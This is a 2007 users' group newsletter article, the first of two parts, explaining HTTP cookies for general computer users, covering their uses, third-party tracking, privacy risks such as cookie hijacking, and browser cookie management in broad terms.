CUGG Member Article

Cookies, Part 1

Eric Moore, CUGG

November 2007

Introduction

I
gave a short presentation on the subject of cookies at the October
2007 meeting of CUGG. Although I covered the basics that every
computer user should now, time did not permit me to explorer the
topic deeply to address specific examples of how to manage cookies
with today's web browsers. This article, the first of two parts,
will serve as a follow-up to my presentation, covering the topic in
greater detail and providing links to online resources for more
information. Part 2, to be written for a future edition of Random
Access, will provide detailed information relating to cookie
management in four popular web browsers: Internet Explorer, Firefox,
Opera, Safari.

Much
of the material in this article is a paraphrase in my own words of a
full-length Wikipedia article on the topic of HTTP
cookies. All credit is due to the Wikipedia contributors,
unless
otherwise noted.

What Is a
Cookie?

An
HTTP cookie, web cookie, or
simply cookie, is a
bit of arbitrary text data that is shared between a web server and a
web browser. A cookie is stored on the user's computer in a text
file known as a cookie file. The specifics of where
cookies
are stored differ between browsers. Internet Explorer creates a
separate text file for every cookie while Firefox maintains a single
text file for every cookie it receives. Ideally, a cookie can only
be returned to the same server that created it or by a server on the
same Internet domain as the originating server. Most cookies will
expire after a certain time. Some expire as soon as the browser is
closed. Other cookies are persistent, in that they
may be
retained for days, weeks, or even longer.

Cookies
were first introduced by Netscape in 1994 for implementing a virtual
shopping cart. Before the introduction of cookies, web transactions
between a web browser and a web server were usually stateless.
When transactions are performed in a stateless manner, the web
server cannot distinguish whether a series of requests for one or
more web pages are made by the same user. As far as the server is
concerned, every request for a page could come from a different user.
As such, no provision can be made to personalize the data sent to
the user or to readily authenticate who has the right to view
information of a private or personal nature.

By
creating a cookie with a unique, arbitrary numeric identifier and
sending it back to the user's web browser, the server can then
request the cookie back whenever the user requests a page from the
server. Based upon the unique identifier, the server can then
respond dynamically to the user's request. For example, if Mary
successfully logs into her online banking account, the server will
return a cookie to authenticate her. As long as she remains logged
in (and the cookie is not deleted), Mary will be able to easily move
from one page to the next as she checks her account balances,
transfers funds between accounts, downloads her monthly statement,
and performs other actions. The cookie also ensures that Mary can
only access her information and not someone else's.

What
Purposes are Cookies Used For?

As
mentioned in the previous section, cookies can be used for
authenticating a user who has logged into a site and restricting her
access only to information associated with her account. Other
functions for cookies are web site personalization and
virtual
shopping carts. In the case of site personalization,
the user
may choose how the site is to be displayed. Such options can include
displaying the site in a particular language, emphasizing certain
content such as news feeds, laying out the information in a
particular way. An example for Google is that the user may elect to
view the page in a foreign language and view the results of a web
search thirty items per page. CNN gives the user an option to view
either the U.S. or international edition of its news site. In each
case, the web server "knows" what the user expects to see
because of the information saved on the user's computer in a cookie
file.

When
shopping on a web site such as Amazon.com
or NewEgg.com,
every item the
user adds to the virtual shopping cart is recorded in a cookie file
and referenced by a unique ID. This way, the server can request the
cookie file each time the user switches between pages, in order to
maintain a current summary of what is in the user's shopping cart and
the running total. The shopping cart may even persist between
browser sessions, so the user can shut down the computer one day and
then revisit the site another day to continue where she left off.

Another
use for cookies is web site tracking. Some
companies create
cookies in order to gather data about users and their browsing
habits. Such cookies are known as third-party cookies,
as
they are created by a foreign server as a side-effect of viewing
another entity's web page. For example, a web site (the first party)
may display banner ads or pictures for another company (the third
party). Each ad or picture may be hosted on a different server than
the one that hosts the main web page. When the web browser sends a
request to the third-party servers to download the ads and pictures,
cookies are created and stored on the user's computer. Each picture
may be associated with a unique cookie, thus enabling the third party
to detect which web sites or pages have been viewed by the user.

The
data in third-party cookies can be used for demographic analysis or
to create targeted advertisements based upon the particular sites and
web pages that a user visits. Although the collection of such data
is done anonymously, it is still of concern to some users who would
prefer to maintain some anonymity when browsing the web. I will
discuss more in this regard later in this article.

Common
Misconceptions

A
number of misconceptions about cookies persist. Since cookies are
merely text data, they cannot do any harm in and of themselves. They
are not viruses, spyware, or other malicious software. They do not
generate popups nor are they used for spamming. They are merely
tokens of data that are passed between a web server and the web
browser. Furthermore, web browsers limit how big a cookie can and
how many cookies may be stored at one time. Nonetheless, privacy
concerns exist in regards to the use and misuse of cookies.

Privacy
Concerns

Although
cookies are harmless by themselves, they can be used or exploited to
undermine a user's privacy. As previously mentioned, tracking
cookies are used for collecting data about a user's browsing habits.
Since tracking cookies are anonymous in nature, their negative effect
on the user is minimal. To paraphrase Douglas Adams, author of The
Hitchhiker's Guide to the Galaxy, cookies are "mostly
harmless."

On
the other hand, a more insidious problem does exist—cooking
hijacking. Cookies may be captured by an unauthorized person
and
used to impersonate a victim in order to gain access to personal
information such as a bank account. Cookie hijacking may be
accomplished by means of packet sniffing, where a
person uses
software to capture the cookie data as it travels across a network.
Although the originating web servers can mitigate the threat by
encrypting the cookies they generate, not all do so.

Another
method by which unauthorized access to cookies may be accomplished is
by means of cross-site scripting. Older versions of
some
browsers had security flaws that made it possible for one web server
to access the cookies created by a foreign web server. Your best
defense against this threat is to use a modern web browser such as
Internet Explore 7 or Firefox 2.0 and keep it up to date. More on
the subject of updating your web browser will be covered in Part 2 of
my article.

Problems
with Cookies

In
addition to the aforementioned privacy concerns, cookies have other
potential problems. Cookies are stored in cookie files on the hard
drive, so they do take up space that could otherwise be used for
storing more useful data. All browsers provide means for managing
cookies, as I will explain in the next section.

Cookies
may contain inaccurate data. For example, if Ron logs into his home
computer and visits NewEgg to shop for a new computer, any items he
places in his shopping cart remain on his home computer. If he
subsequently shops NewEgg's website from his work computer, a
different shopping cart will be created and will not reflect what
items he selected while using his home computer. Likewise, the
cookie data is not shared between browsers, so anything in his added
to his shopping cart while use Firefox will not be visible when using
Internet Explorer.

In
another example, if Ron, Dick, and Jamie share a Windows 98 computer,
which does not support separate users accounts, and each uses the
same web browser, all cookie data for the three users will be
intermingled. This could create anything from minor inconveniences
in the case of a shared shopping cart for NewEgg, to privacy concerns
should one person choose to have himself auto-logged into his banking
site. The best solution is for each user to use a separate computer
or for the three users to use a newer operating system such as
Windows XP, Windows Vista, Mac OS X, or Linux. When each user has
his own separate account, then each one's cookies remain private and
separate from the other users' cookies.

Cookie
Management

Web
browsers provide users the means of managing cookies, from deciding
which cookies to accept and which to reject to choosing when they
should be deleted. The particular features vary between different
brands of web browsers and even between different versions of the
same browser. I will cover in greater detail in Part 2 what options
are available in the most popular browsers. To summarize for now,
among the options that may be available are:

The
follow are just some of the available resources on cookies. Many
more are available. For information on third-party utilities for
managing cookies, you can search popular download sites such as
tucows.com, Download.com. You
can also find reviews of useful cookie tools and information on
the websites for PC
World and
PC Magazine.